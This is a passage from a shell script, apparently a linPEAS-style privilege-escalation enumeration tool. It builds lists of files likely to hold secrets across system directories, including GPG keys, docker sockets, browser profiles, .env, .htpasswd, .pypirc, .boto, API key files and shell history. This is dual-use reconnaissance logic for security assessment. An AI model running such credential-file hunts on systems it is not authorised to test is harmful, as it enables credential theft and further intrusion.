"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E '/lib' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70)
PSTORAGE_PGP_GPG=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E 'README.gnupg' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70)
PSTORAGE_CACHE_VI=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70)
PSTORAGE_DOCKER=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$|dockershim\.sock$|containerd\.sock$|crio\.sock$|frakti\.sock$|rktlet\.sock$|\.docker$"
| sort | uniq | head -n 70) PSTORAGE_FIREFOX=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70)
PSTORAGE_CHROME=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70)
PSTORAGE_OPERA=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70)
PSTORAGE_SAFARI=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70)
PSTORAGE_AUTOLOGIN=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70)
PSTORAGE_FASTCGI=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "fastcgi_params$" | sort | uniq | head -n 70) PSTORAGE_FAT_FREE=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "fat\.config$" | sort | uniq | head -n 70) PSTORAGE_SHODAN=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "api_key$" | sort | uniq | head -n 70) PSTORAGE_CONCOURSE=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.flyrc$|concourse-auth$|concourse-keys$" | sort | uniq | head -n 70)
PSTORAGE_BOTO=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.boto$" | sort | uniq | head -n 70) PSTORAGE_SNMP=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "snmpd\.conf$" | sort | uniq | head -n 70) PSTORAGE_PYPIRC=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.pypirc$" | sort | uniq | head -n 70) PSTORAGE_POSTFIX=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "postfix$" | sort | uniq | head -n 70) PSTORAGE_CLOUDFLARE=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.cloudflared$" | sort | uniq | head -n 70) PSTORAGE_HISTORY=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*_history.*$" | sort | uniq | head -n 70) PSTORAGE_HTTP_CONF=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "httpd\.conf$" | sort | uniq | head -n 70) PSTORAGE_HTPASSWD=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.htpasswd$" | sort | uniq | head -n 70) PSTORAGE_LDAPRC=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.ldaprc$" | sort | uniq | head -n 70) PSTORAGE_ENV=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E 'example' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.env.*$" | sort | uniq | head -n 70) PSTORAGE_MSMTPRC=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
